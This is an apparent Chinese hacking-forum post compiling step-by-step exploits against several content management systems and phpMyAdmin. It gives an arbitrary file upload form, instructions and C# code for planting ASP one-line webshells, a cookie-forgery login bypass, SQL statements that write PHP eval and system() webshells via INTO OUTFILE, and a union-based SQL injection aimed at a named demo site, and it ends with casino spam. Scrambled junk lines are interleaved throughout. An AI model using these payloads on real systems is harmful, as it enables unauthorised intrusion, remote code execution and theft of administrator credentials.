' X, S$ g5 R, q, i& Z, U
0 v' U0 x! A; f) m/ ?2 n
YxShop易想购物商城4.7.1版本任意文件上传漏洞
E" e, `, K; Z6 ?7 \ ?& ?" P# M
( N) s" N9 M1 Q, H
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
+ j6 O" e! f4 T7 q% |8 S
跳转到网站根目录上传任意文件。
+ x4 B4 r0 i U
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
4 M4 x: \: m8 B* R" S
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
* m1 g. A5 J$ C
Upload a new file:<br>
2 v- u# a9 Y Y' E! |$ L; E
<input type="file" name="NewFile" size="50"><br>
( S" J5 }$ ` q2 A$ O; j
<input id="btnUpload" type="submit" value="Upload">
) ?, [- E' `8 Z; ]$ L& {
</form>
6 S% L. M' ~; T! c
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& e/ J+ |+ d8 p% @6 n9 |
" q2 L0 b. s- Z- P b ^
SDcms 后台拿webshell
7 I7 {$ t+ H; C/ v
% q4 L) t6 g4 r8 y/ p
第一种方法:
6 L4 c+ F! R& s' r5 M/ A
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
0 q0 J% P4 W: F9 Z1 c+ R
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
* t, k( o! p- Z) S, U( e& t/ X
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
, G+ G6 |! X: z$ u. _
第二种方法:
1 W, u+ m- U/ Q/ {% b' W! K) Y
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
# h! M& t, k. v8 p
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
0 C% I* {- k2 a8 V! K( z
第三种方法:
! t S0 Z: \9 h' m, X
进入后台-->界面管理-->模板文件管理-->创建文件
( k R/ J* b) X/ V
文件名写入getshell.ashx
) A' @8 J( f- K0 c; e% b
内容写入下面内容:
" E+ C. p8 A" J9 d W+ z
/====================复制下面的=========================/
6 l. T5 H9 l: Z4 O8 u
<%@ WebHandler Language="C#" Class="Handler" %>
, }5 T5 y: i- u; B
using System;
5 D9 q9 A& K0 p
using System.Web;
: L0 I. h7 G8 `. Y# W7 B& \
using System.IO;
/ b# _# K" {. m! @, r. f+ g
public class Handler : IHttpHandler {
! ?) P9 j m# F" a
public void ProcessRequest (HttpContext context) {
7 d. c2 Y1 \9 u/ S6 Z8 |) o
context.Response.ContentType = "text/plain";
5 m: z8 p$ y+ N; F5 q3 p, e
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
0 T1 X) f! W% f$ g. ` I) E) u
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
# t4 a4 B7 x+ P+ y8 L
file1.Flush();
9 S5 X0 m6 x1 \2 l3 G
file1.Close();
T$ C- i6 F( M& r4 g9 d/ K, {
}
. r. L3 j8 Q. h6 c" f8 j1 }7 j
public bool IsReusable {
, S# j0 y) G- q1 X' ?
get {
( ? G# n% H( D t8 r: K9 i
return false;
! H- i8 }6 v3 _ ]7 W% X3 l$ Y
}
. _1 _: V& {3 }4 t
}
; t/ ^8 G( w9 D2 o4 \
}
3 k4 U6 v% c' H
/=============================================/
- \* s) u6 D( ?
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
' z/ v' B J- U8 Q7 D
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
* K; B' p$ ?0 U) n
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% a1 z, C6 J; j! C" w% s4 J
" d2 V) l+ l- o& V
ESCMS网站管理系统0day
6 k& [$ K/ J' |4 r7 Y% o* m
" n! {$ `' y7 ~1 m: l$ R
后台登陆验证是通过admin/check.asp实现的
) ]% r" x" k) c& R, \6 _' v
$ \ k* z4 F$ u
首先我们打开
http://target.com/admin/es_index.html
# q% O& ~. G$ S+ l Z5 V$ b
然后在COOKIE结尾加上
% c* C( o, e5 u- {( q7 R! o; v1 t
; ESCMS$_SP2=ES_admin=st0p;
" ?( p* C3 Y, ^6 d+ Z+ {, M
修改,然后刷新
/ _0 w0 }/ V# P8 r" x
进后台了嘎..
% |: V6 r+ m( O/ N
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
& P0 e" |' q( l6 \3 u' @2 O1 o
& ]4 l# x3 j" L' s( I# ~
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
0 q6 k1 @7 k. u' @
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
6 g: }3 W; }4 Y) X2 I/ b; @
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
5 v: @$ C* V$ K/ ~+ u1 w! p
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
9 k J) s" n6 {7 a% q8 f
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 y0 U& v; }0 f- R" H' }
: y4 g0 \: e- x* k% o1 F* J" W) H
宁志网站管理系统后台无验证漏洞及修复
) Y* Y" v) {- W) Y4 d o5 G
7 J$ Y$ A# D* u9 A' L" o+ o0 L* z' @
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
3 ?/ [; z' Y. x! I ?
官方网站:
www.ningzhi.net
( Q3 o* I- \% ]! Q! S# {
学校网站管理系统 V.2011版本
2 b. O( l& i* ]5 B1 i# {% c; \
http://down.chinaz.com/soft/29943.htm
" K! a; V1 Q2 H; U% {
其它版本(如:政府版等),自行下载.
, M# f& w5 |$ z8 I
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
7 c, L2 C4 _) G; u( y: w/ E ^9 t
login.asp代码如下:
5 g- |" Q T! w# ~# o
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
! ?# i; k" y, }+ Y/ ~5 `6 B
manage.asp代码我就不帖出来了.反正也没验证.
$ P! L$ {4 v" B5 Y- M6 p
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
; B9 _, ^9 T1 b& |) V/ F
漏洞利用:
# Q$ \) F$ ~+ T8 s6 y" X$ U2 u, W
直接访问
http://www.0855.tv/admin/manage.asp
/ O* k5 a# E G' Z; L0 H
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
- I) `' e$ ?8 P
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ T1 w i( s' X5 {
0 D2 u. Z. j0 j
phpmyadmin拿shell的四种方法总结及修复
, t6 ]" _1 c; @' v
$ X- C1 q/ o) J O
方法一:
' k% s1 A3 q! Z
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
0 H4 l; u g9 J6 J- U4 g
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
. r: ` o$ V2 h; k" a8 k
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
0 h/ `0 x0 o/ S" }- o7 f6 W/ ^# t
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
4 z7 o! E! U: j! [9 D
一句话连接密码:7on
$ S! e" I" ?7 d/ g% F
方法二:
# o8 J( Z* S/ M% G) m* \6 n
读取文件内容: select load_file('E:/xamp/www/s.php');
/ z' X$ i; ~1 o3 f+ |7 }
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
5 u3 h, l+ s" T+ Z3 l
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
: B. h+ n: n% r N8 f$ A
方法三:
2 a! E7 h) o2 z P
JhackJ版本 PHPmyadmin拿shell
! |* b H& @1 }* k. B
Create TABLE study (cmd text NOT NULL);
. Y; x; E- |! j0 r: _ I
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
1 O4 ?4 ?0 ^. O7 H5 [
select cmd from study into outfile 'E:/wamp/www/7.php';
" b# K; T1 y4 [8 F9 `9 r/ }1 E
Drop TABLE IF EXISTS study;
+ A% T$ `' `6 _7 Y3 D' a5 u
<?php eval($_POST[cmd])?>
( v Z' O; r. u/ v& u: f2 v# X
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
! H ?: b1 c; j" `: X
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
7 n8 v6 c* i7 z. [9 c
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
6 }5 [ G" J8 U, z; Q" |
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
8 {4 n [7 ]5 l0 C6 \% E( Z( g/ d
方法四:
4 t' i2 Y$ l+ \" @6 b' [
select load_file('E:/xamp/www/study.php');
. U7 O5 x$ e4 W3 O- R& B
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; Y, n i2 p) H a7 r, o3 q4 y
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
; i" \, a% z; V, N9 p5 C
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 B" L- e* z, Z2 k) t0 T s
$ i7 ~, }: H( U, F
NO.001中学网站管理系统 Build 110628 注入漏洞
& v( _" {7 W8 a. q
3 Y2 ]/ O2 P" m) f* i- G" v
NO.001中学网站管理系统功能模块:
0 b) E5 t) T4 g: h) K. J
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
8 O6 J$ q, v- y V8 k0 \
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
$ K) y2 Z' B7 U0 ^
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
$ P! ], B0 p$ [/ R- l k7 J% B
4.视频图片管理:一级分类,动态添加视频或者图片等信息
' Z7 i8 W6 a g6 g; R
5.留言管理:对留言,修改,删除、回复等管理
0 J. f. @. I9 j& i" m/ i. z& U
6.校友频道:包括校友资料excel导出、管理等功能
0 V, A! q4 T( Y6 L. v
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
3 g* l, n6 b3 H
默认后台:admin/login.asp
0 l* a4 f6 W: p9 Q
官方演示:
http://demo.001cms.net
- Y, g& }& Q, Q; q% h% S* Y
源码下载地址:
http://down.chinaz.com/soft/30187.htm
9 @: R. L. ? p
EXP:
( J" Q+ ~5 n0 k# M. C4 h+ e r i; D
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
" Q0 w& Q$ Z2 r3 V2 m& X
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
6 ~3 G# c& Z0 @* `- B- b' Q- Z
getshell:后台有备份,你懂的
' s l! J( Q% _+ k* M6 D
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
7 }; [, T8 e& W8 ?: o
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2